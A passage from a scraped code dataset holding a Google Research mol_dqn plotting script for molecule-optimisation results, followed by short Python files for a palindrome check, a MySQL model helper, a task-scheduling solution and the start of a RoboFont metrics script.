original_mol.GetBonds()[i].GetBondType() != next_mol.GetBonds(\n )[i].GetBondType():\n highlight_bonds.append(next_mol.GetBonds()[i].GetIdx())\n if next_num_bonds > original_num_bonds:\n highlight_bonds.extend(range(original_num_bonds, next_num_bonds))\n return highlight_atoms, highlight_bonds\n\n\ndef tidy_smiles(smiles):\n new_smiles = {\n 'weight_0': list(set(smiles['weight_0'][-30:])),\n 'weight_1': list(set(smiles['weight_1'][-30:])),\n 'weight_2': list(set(smiles['weight_2'][-150:])),\n 'weight_3': list(set(smiles['weight_3'][-150:])),\n 'weight_4': list(set(smiles['weight_4'][-150:])),\n 'weight_5': list(set(smiles['weight_5'][-150:]))\n }\n return new_smiles\n\n\ndef get_properties(smiles, target_molecule='C1CCC2CCCCC2C1'):\n target_mol_fp = AllChem.GetMorganFingerprintAsBitVect(\n Chem.MolFromSmiles(target_molecule), radius=2, nBits=2048)\n mol = Chem.MolFromSmiles(smiles)\n if mol is None:\n return 0.0, 0.0\n fingerprint_structure = AllChem.GetMorganFingerprintAsBitVect(\n mol, radius=2, nBits=2048)\n sim = DataStructs.TanimotoSimilarity(target_mol_fp, fingerprint_structure)\n qed = QED.qed(mol)\n return sim, qed\n\n\ndef plot_multi_obj_opt(smiles, target_mol, idx=0):\n with open('all_molecules_with_id.json') as f:\n molid = json.load(f)\n colors = iter(cm.rainbow(np.linspace(0, 1, 6)))\n plt.figure()\n for i in range(6):\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n plt.scatter(sim, qed, label='w=%.1f' % (i * 0.2), color=next(colors))\n target_sim, target_qed = get_properties(target_mol, target_mol)\n plt.axvline(x=target_sim, ls='dashed', color='grey')\n plt.axhline(y=target_qed, ls='dashed', color='grey')\n leg = plt.legend()\n leg.get_frame().set_alpha(0.95)\n plt.ylim((-0.2, 1))\n plt.xlabel('Similarity')\n plt.ylabel('QED')\n plt.title(molid[target_mol])\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.88)\n plt.savefig('batch/mult_obj_gen_{}.pdf'.format(idx))\n #plt.show()\n\n\ndef plot_multi_obj_gen_drug20():\n with open('multi_obj_opt_drug20.json') as f:\n data = json.load(f)\n plot_multi_obj_opt_multi_plot(result['smiles'], result['target_mol'], 2)\n\n\ndef plot_qed_improvements():\n with open('qed_imp_2.json') as f:\n improvements = json.load(f)\n\n def double_gaussian(x, params):\n (c1, mu1, sigma1, c2, mu2, sigma2) = params\n res = c1 * np.exp( - (x - mu1)**2.0 / (2.0 * sigma1**2.0) ) \\\n + c2 * np.exp( - (x - mu2)**2.0 / (2.0 * sigma2**2.0) )\n return res\n\n def double_gaussian_fit(params, y):\n fit = double_gaussian(x, params)\n return (fit - y)\n\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 6))))\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n plt.figure()\n start = -0.4\n end = 0.6\n for i in range(6):\n imp = np.array(improvements['weight_%i' % i])\n y, binEdges = np.histogram(imp, bins=40, range=(start, end))\n y = y.astype(np.float64)\n y /= y.sum()\n x = 0.5 * (binEdges[1:] + binEdges[:-1])\n if i == 0:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.3, 0.1])\n elif i == 1:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.1, 0.1])\n else:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.02, 1, 0.1, 0.05])\n xx = np.linspace(start, end, 300)\n yy = double_gaussian(xx, fit[0])\n\n plt.plot(x, y, 'o', color=colors[i], alpha=0.3)\n plt.plot(\n xx,\n yy,\n color=colors[i],\n label='w=%.1f' % (i * 0.2),\n )\n plt.xlim(start, end)\n # plt.ylim(-0.02, 0.2)\n\n plt.legend()\n plt.xlabel('Improvements on QED')\n plt.ylabel('Normalized count')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('qed_improvements.pdf')\n plt.show()\n\n\ndef plot_qed_relative_improvements():\n with open('qed_rel_imp_2.json') as f:\n improvements = json.load(f)\n\n def double_gaussian(x, params):\n (c1, mu1, sigma1, c2, mu2, sigma2) = params\n res = c1 * np.exp( - (x - mu1)**2.0 / (2.0 * sigma1**2.0) ) \\\n + c2 * np.exp( - (x - mu2)**2.0 / (2.0 * sigma2**2.0) )\n return res\n\n def double_gaussian_fit(params, y):\n fit = double_gaussian(x, params)\n return (fit - y)\n\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 6))))\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n plt.figure()\n start = -1\n end = 1\n for i in range(6):\n imp = np.array(improvements['weight_%i' % i])\n y, binEdges = np.histogram(imp, bins=40, range=(start, end))\n y = y.astype(np.float64)\n y /= y.sum()\n x = 0.5 * (binEdges[1:] + binEdges[:-1])\n if i == 0:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0.5, 0.1, 1, 0.6, 0.1])\n elif i == 1:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0.2, 0.05, 1, 0.5, 0.1])\n else:\n fit = leastsq(lambda x: double_gaussian_fit(x, y),\n [1, 0, 0.1, 1, 0.4, 0.5])\n xx = np.linspace(start, end, 300)\n yy = double_gaussian(xx, fit[0])\n\n plt.plot(x, y, 'o', color=colors[i], alpha=0.3)\n plt.plot(\n xx,\n yy,\n color=colors[i],\n label='w=%.1f' % (i * 0.2),\n )\n plt.xlim(start, end)\n # plt.ylim(-0.02, 0.2)\n\n plt.legend()\n plt.xlabel('Relative improvements on QED')\n plt.ylabel('Normalized count')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('qed_rel_improvements.pdf')\n plt.show()\n\n\ndef plot_drug20_smiles():\n with open('drug_20_smiles.json') as f:\n data = json.load(f)\n smiles = sum(data.values(), [])\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n target_mol = 'CN1C(=O)C2(OCCO2)c3ccccc13'\n template1 = Chem.MolFromSmiles('N1C(=O)C2(OCCO2)c3ccccc13')\n AllChem.Compute2DCoords(template1, canonOrient=True)\n\n properties = [\n 'SIM: %.3f\\nQED: %.3f' % get_properties(mol, target_mol) for mol in smiles\n ]\n # img = Draw.MolsToGridImage(mols, molsPerRow=5,\n # subImgSize=(300, 150), useSVG=True)\n # imgsize = (280, 100)\n # drawer = rdMolDraw2D.MolDraw2DSVG(imgsize[0] * 5, imgsize[1] * 6 + 20,\n # imgsize[0], imgsize[1])\n # drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n # drawer.drawOptions().legendFontSize = 18\n # drawer.DrawMolecules(mols, legends=properties)\n # drawer.FinishDrawing()\n # img = drawer.GetDrawingText()\n #cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='drug20_smiles.pdf')\n for i in range(4, 5):\n smiles = data[f'weight_{i}']\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n for mol in mols:\n try:\n AllChem.GenerateDepictionMatching2DStructure(mol, template1)\n except:\n pass\n properties = [\n 'SIM: %.3f, QED: %.3f' % get_properties(mol, target_mol)\n for mol in smiles\n ]\n imgsize1 = [260, 340, 280, 280, 220, 220]\n imgsize = (240, imgsize1[i])\n drawer = rdMolDraw2D.MolDraw2DSVG(imgsize[0] * 5, imgsize[1] + 5,\n imgsize[0], imgsize[1])\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(\n bytestring=img.encode('utf-8'), write_to=f'drug1_smiles_w{i}.pdf')\n\n\ndef plot_max_qed_mols_2():\n smiles = {\n 'CCC1C(=O)C(C)(Cc2cnc3[nH]c4c(n23)CCO4)CC1C': 0.9480413389762415,\n 'CCC(C)C12C3=CC(=O)C1Cc1cc4nc(OC)[nH]c4c(c12)C3': 0.9477126732214856,\n 'CCCC1C(C)=NCC12COCC2n1cc2ocnc2c1O': 0.9469782135033733,\n 'C=Cc1nc(OC)[nH]c1-c1c(C)cc2c3c1CC(=O)C(CC2)O3': 0.9465532716678036,\n }\n mols = [Chem.MolFromSmiles(k) for k, v in smiles.items()][:4]\n properties = ['QED: %.3f' % v for k, v in smiles.items()]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_qed_mols_2.pdf')\n\n\ndef plot_max_logp_mols_2():\n logp = [11.7435, 11.7182, 11.7090, 11.7090]\n smiles = [\n 'C=C(CCCCCCCC=C(CCCCCC)CCCCC(C)=CCCCC)C(C)(C)CCCCCCC(C)C',\n 'C=C(CCCCC)CCCCCCC=C(CCCCCC=CCCC)CCCC(C)(C)CCCCCCC(C)C',\n 'C=C(CCCCC(C)=CCCCCCC)CCCC(CCCCCC(C)C)=C(C)CCCCCCCC(C)(C)C',\n 'C=C(CCCCC(C)=CCCCCCC)CCCC(CCCCCCCC(C)(C)C)=C(C)CCCCCC(C)C'\n ]\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n properties = ['Penalized logP: %.2f' % v for v in logp]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_logp_mols_2.pdf')\n\n\ndef plot_max_logp_mols():\n logp = [11.7069205, 11.63197045, 11.6280874, 11.62077996]\n smiles = [\n 'CCCCCC=C(CCCC(CC)CC)CCC(C)(C)CCCCC(C)=CCCCCCCC(C)(C)CCCC',\n 'C=C(CCCCCCCC=CCC)CCC(=CCCCCC(C)(C)CCCCCCC(CC)CC)CCCCC',\n 'C=C(CCCCCC)CCCC(=CCCCCC(C)(C)CCCCCCC(CC)CC)CCCCC=CCCC',\n 'C=C(CCCCC(C)(C)CCCC(C)(CC)CC)CCC(=CCCCCCC(CC)CC)CCCCCCCC'\n ]\n mols = [Chem.MolFromSmiles(ss) for ss in smiles]\n properties = ['Penalized logP: %.2f' % v for v in logp]\n # img = Draw.MolsToGridImage(mols, molsPerRow=2, legends=properties,\n # subImgSize=(300, 200), useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(600, 400, 300, 200)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(mols, legends=properties)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='max_logp_mols.pdf')\n\n\ndef plot_noisy_qed_reward():\n colors = list(iter(cm.rainbow(np.linspace(0, 1, 4))))\n with open('noise.json') as f:\n all_qed = json.load(f)\n plt.figure()\n for i in range(4):\n qed = all_qed['robust_0.%i' % i]\n lq = len(qed)\n window = 200\n\n x = [j * 200 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)])\n for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(x, y, k=3)\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, '-', alpha=0.2, color=colors[i])\n plt.plot(xx, fit(xx), label='robust, $\\sigma$=0.%i' % i, color=colors[i])\n\n qed = all_qed['l2_0.%i' % i]\n lq = len(qed)\n window = 200\n\n x = [j * 200 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)])\n for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(x, y, k=3)\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, ls='dashed', alpha=0.2, color=colors[i])\n plt.plot(\n xx,\n fit(xx),\n ls='dashed',\n label='l2, $\\sigma$=0.%i' % i,\n color=colors[i])\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 1)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('noisy_reward.pdf')\n plt.show()\n\n\ndef plot_final_vs_intermediate_reward():\n with open('final_vs_interm_reward.json') as f:\n all_qed = json.load(f)\n plt.figure()\n qed = all_qed['intermediate_reward']\n lq = len(qed)\n window = 200\n\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C0', alpha=0.2)\n plt.plot(xx, fit(xx), label='intermediate reward')\n\n qed = all_qed['final_reward']\n lq = len(qed)\n window = 200\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C1', alpha=0.2)\n plt.plot(xx, fit(xx), label='final reward')\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 0.8)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('final_vs_intermediate_reward.pdf')\n plt.show()\n\n\ndef plot_qvals_with_change_20():\n highlightcolor = (0.98, 0.85, 0.37)\n\n with open('q_values_20.json') as f:\n qvals = json.load(f)\n\n original_smiles = 'CN1C(=O)C2(OCCO2)c2ccccc21'\n original_state = Chem.MolFromSmiles(original_smiles)\n original_state2 = Chem.MolFromSmiles(original_smiles)\n\n next_states = list(\n get_valid_actions(\n state=original_smiles,\n atom_types={'C', 'N', 'O'},\n allow_removal=False,\n allow_no_modification=True,\n allowed_ring_sizes={3, 5, 6},\n allow_bonds_between_rings=False))\n\n bond_removal_actions = [\n Chem.MolToSmiles(ss) for ss in _bond_removal(original_state2)\n ]\n # bond_removal_actions = {}\n stated = {Chem.MolToSmiles(s): s for s in next_states}\n mols = []\n ha = []\n hb = []\n hac = []\n hbc = []\n prop = []\n for k, v in sorted(qvals.items(), key=lambda x: -x[1]):\n if k in stated or k in bond_removal_actions:\n if k in stated:\n mol = stated[k]\n mols.append(mol)\n hla, hlb = highlights_diff(original_state, mol)\n ha.append(hla)\n hb.append(hlb)\n hac.append({a: highlightcolor for a in hla})\n hbc.append({b: highlightcolor for b in hlb})\n else:\n mols.append(Chem.MolFromSmiles(k))\n ha.append([])\n hb.append([])\n hac.append({})\n hbc.append({})\n prop.append('%.4f' % v)\n\n # img = Draw.MolsToGridImage(mols, molsPerRow=5,\n # subImgSize=(300, 150),\n # legends=prop,\n # highlightAtomLists=ha,\n # highlightBondLists=hb,\n # highlightAtomColors=hac,\n # highlightBondColors=hbc,\n # useSVG=True)\n\n nmols = len(mols)\n ncols = 5\n nrows = math.ceil(float(nmols) / ncols)\n drawer = rdMolDraw2D.MolDraw2DSVG(ncols * 220, nrows * 180 + 20, 220, 180)\n drawer.SetFontSize(0.75) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 20\n drawer.DrawMolecules(\n mols,\n legends=prop,\n highlightAtoms=ha,\n highlightBonds=hb,\n highlightAtomColors=hac,\n highlightBondColors=hbc)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='qval_mat_20.pdf')\n\n\ndef plot_opt_path_20():\n highlightcolor = (0.98, 0.85, 0.37)\n\n smiles = [\n 'CN1C(=O)C2(OCCO2)c3ccccc13', 'C=C1COC2(O1)C(=O)N(C)c1ccccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1ccccc12', 'C=C1COC2(O1)C(=O)N(CO)c1c(C)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(CC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(CCC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(C(C)CC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(C(C)C(C)C)cccc12'\n ]\n\n template1 = Chem.MolFromSmiles(smiles[0])\n AllChem.Compute2DCoords(template1, canonOrient=True)\n\n mols = [Chem.MolFromSmiles(smiles[0])]\n ha = [[]]\n hb = [[]]\n hac = [{}]\n hbc = [{}]\n prop = ['Step: 0, QED: %.4f' % QED.qed(mols[0])]\n N = len(smiles)\n for i in range(1, N):\n original_smiles = smiles[i - 1]\n original_state = Chem.MolFromSmiles(original_smiles)\n\n next_states = list(\n get_valid_actions(\n state=original_smiles,\n atom_types={'C', 'N', 'O'},\n allow_removal=True,\n allow_no_modification=True,\n allowed_ring_sizes={3, 5, 6},\n allow_bonds_between_rings=False))\n\n stated = {Chem.MolToSmiles(s): s for s in next_states}\n current_smiles = smiles[i]\n\n mol = stated[current_smiles]\n mols.append(mol)\n hla, hlb = highlights_diff(original_state, mol)\n ha.append(hla)\n hb.append(hlb)\n hac.append({a: highlightcolor for a in hla})\n hbc.append({b: highlightcolor for b in hlb})\n prop.append('Step: %i, QED: %.4f' % (i, QED.qed(mol)))\n\n for i in range(8):\n AllChem.GenerateDepictionMatching2DStructure(mols[i], template1)\n\n # img = Draw.MolsToGridImage(mols, molsPerRow=3,\n # subImgSize=(300, 150),\n # legends=prop,\n # highlightAtomLists=ha,\n # highlightBondLists=hb,\n # highlightAtomColors=hac,\n # highlightBondColors=hbc,\n # useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(220 * 4, 160 * 2 + 20, 220, 160)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(\n mols,\n legends=prop,\n highlightAtoms=ha,\n highlightBonds=hb,\n highlightAtomColors=hac,\n highlightBondColors=hbc)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='opt_path_20.pdf')\n\n\ndef plot_time_dependent_reward():\n with open('time_dependent.json') as f:\n all_qed = json.load(f)\n plt.figure()\n qed = all_qed['no_time']\n lq = len(qed)\n window = 200\n\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C0', alpha=0.2)\n plt.plot(xx, fit(xx), label='time-independent policy')\n\n qed = all_qed['with_time']\n lq = len(qed)\n window = 200\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C1', alpha=0.2)\n plt.plot(xx, fit(xx), label='time-dependent policy')\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 0.93)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('time_heterogeneous.pdf')\n plt.show()\n\n\ndef plot_episode_length():\n with open('episode_length.json') as f:\n length_list = json.load(f)\n plt.figure()\n plt.hist(\n length_list,\n bins=[9, 10, 11, 12, 13, 14, 15, 16],\n edgecolor='black',\n linewidth=1.5)\n plt.xlabel('Number of steps before termination')\n plt.ylabel('Count')\n plt.title('Max Number of Steps: 20')\n\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.90)\n plt.savefig('episode_length.pdf')\n plt.show()\n\n\ndef plot_episode_length_qed():\n with open('episode_length_qed.json') as f:\n length_list = json.load(f)\n plt.figure()\n plt.hist(length_list, bins=40, edgecolor='black', linewidth=1.5)\n plt.xlim((-1, 42))\n plt.xlabel('Number of steps before termination')\n plt.ylabel('Count')\n plt.title('Max Number of Steps: 40')\n\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.90)\n plt.savefig('episode_length_qed.pdf')\n plt.show()\n\n\ndef multi_obj_gen_stat():\n with open('multi_objective_generation.json') as f:\n data = json.load(f)\n objs = [(2.2, 0.84), (2.5, 0.27), (3.8, 0.84), (4.8, 0.27)]\n for i in range(1, 5):\n tarSAS = objs[i - 1][0]\n tarQED = objs[i - 1][1]\n prop = list(zip(*data[str(i)]))\n prop = [list(set(pp)) for pp in prop]\n print('targetSAS=%.3f, generatedSAS:mean=%.3f, var=%.3f,'\n 'mean_absolute_difference=%.3f' %\n (tarSAS, np.mean(prop[0]), np.std(prop[0]),\n np.mean(np.abs(np.array(prop[0]) - tarSAS))))\n print('targetQED=%.3f, generatedQED:mean=%.3f, var=%.3f,'\n 'mean_absolute_difference=%.3f' %\n (tarQED, np.mean(prop[1]), np.std(prop[1]),\n np.mean(np.abs(np.array(prop[1]) - tarQED))))\n\n\ndef plot_multi_obj_opt_multi_plot(smiles, target_mol, idx=0):\n with open('all_molecules_with_id.json') as f:\n molid = json.load(f)\n colors = iter(cm.rainbow(np.linspace(0, 1, 6)))\n colors = iter(cm.Set2(np.linspace(0, 1, 8)))\n colors = sns.color_palette('husl', 6)\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n smiles = tidy_smiles(smiles)\n # plt.figure()\n all_sim = []\n all_qed = []\n target_sim, target_qed = get_properties(target_mol, target_mol)\n for i in range(6):\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n all_sim += list(sim)\n all_qed += list(qed)\n\n fig, ax = plt.subplots(nrows=3, ncols=2, sharex=True, sharey=True)\n i = 0\n for row in ax:\n for col in row:\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n # col.scatter(all_sim, all_qed, color='#d4d4d4')\n col.scatter(sim, qed, label='w=%.1f' % (i * 0.2), color=colors[i])\n col.axvline(x=target_sim, ls='dashed', color='grey')\n col.axhline(y=target_qed, ls='dashed', color='grey')\n leg = col.legend(loc='lower left', handletextpad=0.0)\n leg.get_frame().set_alpha(0.75)\n col.set_ylim((-0.2, 1))\n col.set_xlim((-0.1, 1.1))\n i += 1\n fig.text(0.5, 0.02, 'Similarity', ha='center')\n fig.text(0.02, 0.5, 'QED', va='center', rotation='vertical')\n fig.text(0.5, 0.94, molid[target_mol], ha='center')\n plt.subplots_adjust(left=0.10, bottom=0.14, right=0.96, top=0.92, wspace=0.12)\n plt.savefig('batch/mult_obj_gen_{}.pdf'.format(idx))\n # plt.show()\n\n\ndef plot_target_sas():\n df = pd.read_csv('target_sas_results.csv')\n plt.figure(figsize=(5, 5))\n df25 = df[df['target_sas'] == 2.5]\n x25 = df25['original_sas']\n y25 = df25['sas']\n plt.scatter(x25, y25, label='target_sas=2.5')\n plt.axhline(y=2.5, ls='dashed', color='grey')\n\n df48 = df[df['target_sas'] == 4.8]\n x48 = df48['original_sas']\n y48 = df48['sas']\n plt.scatter(x48, y48, label='target_sas=4.8')\n plt.axhline(y=4.8, ls='dashed', color='grey')\n\n ax = plt.gca()\n ax.set_aspect('equal')\n plt.xlim(0.5, 5.5)\n plt.ylim(0.5, 5.5)\n plt.xticks([1, 2, 3, 4, 5])\n print('Target SAS 2.5')\n print(f'Mean: {np.mean(y25)}, Std: {np.std(y25)}')\n print('Target SAS 4.8')\n print(f'Mean: {np.mean(y48)}, Std: {np.std(y48)}')\n\n plt.subplots_adjust(left=0.13, bottom=0.14, right=0.96, top=0.92, wspace=0.12)\n plt.legend()\n plt.xlabel('SA score of the original molecules')\n plt.ylabel('SA score of the generated molecules')\n plt.savefig('target_sas.pdf')\n plt.show()\n\n\nplot_target_sas()\n# multi_obj_gen_stat()\n# plot_opt_path_20()\n# plot_qvals_with_change_20()\n# plot_multi_obj_gen_drug20()\n# plot_qed_relative_improvements()\n# plot_qed_improvements()\n# plot_drug20_smiles()\n# plot_max_qed_mols_2()\n# plot_max_logp_mols_2()\n# plot_noisy_qed_reward()\n# plot_final_vs_intermediate_reward()\n# plot_episode_length_qed()\n# plot_episode_length()\n","repo_name":"google-research/google-research","sub_path":"mol_dqn/plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":35005,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"43181647322","text":"T = int(input())\n\ndef secondCheck(word,left,right):\n while (left < right):\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n return False\n return True\n\n\ndef firstCheck(word,left,right):\n while (left < right):\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n check1 = secondCheck(word,left+1,right)\n check2 = secondCheck(word,left,right-1)\n if(check1 or check2):\n return 1\n else:\n return 2\n return 0\n\nfor _ in range(T):\n word = list(input())\n left=0\n right=len(word)-1\n ans = firstCheck(word,left,right)\n print(ans)","repo_name":"cheonsol-lee/algorithm","sub_path":"백준/17609(회문).py","file_name":"17609(회문).py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"33465942988","text":"import db.mysql as mysql_db\nimport pymysql\n\n\nclass CommonModel:\n def __init__(self):\n self.tableName = ''\n\n def query(self, sql):\n rows = mysql_db.query(sql)\n if rows == None or len(rows) == 0:\n return []\n return rows\n\n def escapeString(self, string):\n return pymysql.escape_string(string)\n\n def update(self, sql):\n return mysql_db.update(sql)\n\n def load(self, id):\n sql = \"select * from %s where id=%s\" % (self.tableName, id)\n rows = self.query(sql)\n if rows == None or len(rows) == 0:\n return None\n row = rows[0]\n return row\n\n def delete(self, id):\n sql = \"delete from %s where id=%s\" % (self.tableName, id)\n return self.update(sql)\n\n def rows(self):\n sql = \"select * from %s\" % self.tableName\n items = self.query(sql)\n if items == None or len(items) == 0:\n return []\n return items\n\n def isColumnExists(self, where):\n sql = \"select count(*) as cnt from %s %s\" % (self.tableName, where)\n rows = self.query(sql)\n if rows == None or len(rows) == 0:\n return False\n row = rows[0]\n cnt = row['cnt']\n if cnt <= 0:\n return False\n else:\n return True\n\n def lastrowid(self):\n return mysql_db.lastrowid()\n\n def getVariMapByVariList(self, l):\n '''\n 将列表中的多个变量组成一个字典\n '''\n m = {}\n for item in l:\n key = item['key']\n value = item['value']\n m[key] = value\n return m\n\n def jd(self, string, jdaLength=10):\n length = len(string)\n if length <= jdaLength:\n return string\n jd_str = string[0:jdaLength]\n return jd_str + '...'","repo_name":"zyxyuanxiao/hotpot","sub_path":"model/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10684553541","text":"class Solution:\n def getOrder(self, tasks: List[List[int]]) -> List[int]:\n for i in range(len(tasks)):\n tasks[i]=[tasks[i][0],tasks[i][1],i]\n tasks.sort(key=lambda x:x[0])\n res=[]\n time=tasks[0][0]\n min_heap=[]\n i=0\n while min_heap or i=tasks[i][0]:\n heapq.heappush(min_heap,[tasks[i][1],tasks[i][2]])\n i+=1\n if not min_heap:\n time=tasks[i][0]\n else:\n procTime,index=heapq.heappop(min_heap)\n time+=procTime\n res.append(index)\n return res\n ","repo_name":"HenokMekuanint/Competitiveprogramming","sub_path":"1834-single-threaded-cpu/1834-single-threaded-cpu.py","file_name":"1834-single-threaded-cpu.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"5962019154","text":"# -*- coding: UTF-8 -*-\n#\n# ----------------------------------------------------------------------------------\nfrom vanilla import *\nfrom defconAppKit.windows.baseWindow import BaseWindowController\nfrom AppKit import *\nimport os.path\nfrom mojo.roboFont import version\n\ndef sortFonts(fonts):\n \"\"\"\n Some day I will implement this.\n \"\"\"\n return fonts\n\n # ---------------------------------------------------------------------------------------------------------\n # A D J U S T M E T R I C S\n #\n # Adjust metrics.\n #\n \"\"\"\n\n Adjust both margins, left margin, or right margin\n To current glyph selection or all glyphs\n In current font or a selection of opened fonts\n\n Options:\n\n Adjust components (on by default): If 'A' is selected but not 'Aacute', 'Aacute' will be shifted back so it does not affect the original position.\n\n Adjust Comps with Selected (off by default): If 'A' is selected, also transform 'Aacute' et. al.\n\n \"\"\"\n\ndef addMargins(f, gnames=[], leftUnits=0, rightUnits=0, adjustComponents=True):\n for gname in gnames:\n if gname in f:\n g = f[gname]\n g.prepareUndo('addMargins')\n # do left side\n if leftUnits != 0:\n # RF3\n if version >= \"3.0\":\n if g.bounds:\n g.leftMargin += leftUnits\n else:\n g.width += leftUnits\n # RF1\n else:\n if g.box:\n g.leftMargin += leftUnits\n else:\n g.width += 